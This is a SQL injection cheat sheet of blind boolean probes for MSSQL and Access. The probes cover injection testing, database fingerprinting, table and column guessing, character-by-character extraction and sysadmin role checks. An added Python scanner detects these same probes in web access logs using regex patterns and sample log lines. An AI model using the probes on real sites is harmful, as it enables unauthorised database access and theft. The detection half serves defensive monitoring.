1. Check whether the parameter is injectable: ;and 1=1 ;and 1=2
2. Preliminary check for MSSQL: ;and user>0
3. When the injected parameter is a string: 'and [condition] and ''='
4. For a search field whose parameter is not filtered: 'and [condition] and '%25'=' (%25 is the URL-encoded % wildcard)
5. Identify the database system
;and (select count(*) from sysobjects)>0     mssql
;and (select count(*) from msysobjects)>0    access
6. Guess the table name: ;and (select Count(*) from [table_name])>0
7. Guess a column name: ;and (select Count(column_name) from table_name)>0
8. Guess the length of the value in the column: ;and (select top 1 len(column_name) from table_name)>0
9. (1) Guess the ASCII value of a character in the column (Access)
;and (select top 1 asc(mid(column_name,1,1)) from table_name)>0
(2) Guess the ASCII value of a character in the column (MSSQL)
;and (select top 1 unicode(substring(column_name,1,1)) from table_name)>0
10. Test the privilege structure (MSSQL)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
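Every probe in steps 1 to 10 travels in a request parameter, so the whole sequence is visible in the web server's access log. The following is an added example, not part of the original sheet: a scanner that URL-decodes each query-string value and matches it against regexes derived only from the probe strings listed above, then reports clients that used several distinct probes, which is the footprint of the manual enumeration the sheet describes. The log lines are constructed for the example (Apache common log format is assumed), and the paths, table and column names in them are placeholders.

```python
"""Detect the boolean-based probes from this sheet in web access logs.
Added example; the log lines are constructed and the regexes come only
from the probe strings listed on this page."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Each rule: a name and a regex over the URL-decoded, lower-cased value.
PROBE_RULES = [
    ("boolean-probe", re.compile(r"\band\s+\d+\s*=\s*\d+")),          # and 1=1 / and 1=2
    ("mssql-user-test", re.compile(r"\buser\s*>\s*0")),               # and user>0
    ("quote-break", re.compile(r"'\s*and\s.*\band\s*'%?'\s*=\s*'")),   # 'and ... and ''='  /  '%'='
    ("catalog-enum", re.compile(r"\bm?sysobjects\b")),                # sysobjects / msysobjects
    ("column-brute", re.compile(r"select\s+top\s+1\s+(len|asc|unicode)\(")),
    ("role-check", re.compile(r"is_srvrolemember\s*\(")),
]

# Apache common log format: client, identd, user, [time] "METHOD target proto" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')

# Constructed sample log; 10.0.0.9 walks through the sheet, the others are benign.
LOG_LINES = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /news.asp?id=42 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /news.asp?id=42%20and%201=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /news.asp?id=42%20and%201=2 HTTP/1.1" 200 312',
    '10.0.0.9 - - [10/Oct/2023:13:55:45 +0000] "GET /news.asp?id=42%20and%20user%3E0 HTTP/1.1" 500 1044',
    '10.0.0.9 - - [10/Oct/2023:13:55:50 +0000] "GET /search.asp?q=%27%20and%20(select%20count(*)%20from%20sysobjects)%3E0%20and%20%27%25%27=%27 HTTP/1.1" 200 2210',
    '10.0.0.9 - - [10/Oct/2023:13:55:58 +0000] "GET /news.asp?id=42%20and%20(select%20top%201%20len(c1)%20from%20t1)%3E0 HTTP/1.1" 200 312',
    '10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /news.asp?id=42%3Band%201=(select%20IS_SRVROLEMEMBER(%27sysadmin%27))%3B-- HTTP/1.1" 200 5120',
    '10.0.0.7 - - [10/Oct/2023:13:56:10 +0000] "GET /search.asp?q=sysadmin%20handbook HTTP/1.1" 200 1800',
]


def decode_value(raw):
    # parse_qsl has already decoded once; decode again so a doubly encoded
    # quote (%2527 -> %27 -> ') is seen in the same form as a plain one.
    return unquote(raw).lower()


def scan_request(uri):
    """Return (parameter, rule) pairs for every probe found in one request target."""
    hits = []
    for name, raw in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        value = decode_value(raw)
        for rule, rx in PROBE_RULES:
            if rx.search(value):
                hits.append((name, rule))
    return hits


def scan_log(lines):
    """Parse access-log lines and return one finding per matched probe."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, uri, status = m.groups()
        for param, rule in scan_request(uri):
            findings.append({"ip": ip, "param": param, "rule": rule,
                             "status": int(status)})
    return findings


def offending_clients(findings, threshold=2):
    """Clients that used at least `threshold` distinct probe types: one stray
    match may be a false positive, several different probes from one address
    is the enumeration sequence above."""
    rules_by_ip = {}
    for f in findings:
        rules_by_ip.setdefault(f["ip"], set()).add(f["rule"])
    return sorted(ip for ip, rules in rules_by_ip.items() if len(rules) >= threshold)


if __name__ == "__main__":
    results = scan_log(LOG_LINES)
    for f in results:
        print(f"{f['ip']:10s} {f['param']:4s} {f['rule']:16s} status={f['status']}")
    print("clients running the probe sequence:", offending_clients(results))
```

Matching after URL decoding matters because step 4's `%25` arrives at the application as `%`, and a doubly encoded quote would otherwise slip past a literal match. The benign query for "sysadmin handbook" shows why the per-client threshold is there: a single keyword hit is not evidence, a run of different probe shapes from one address is.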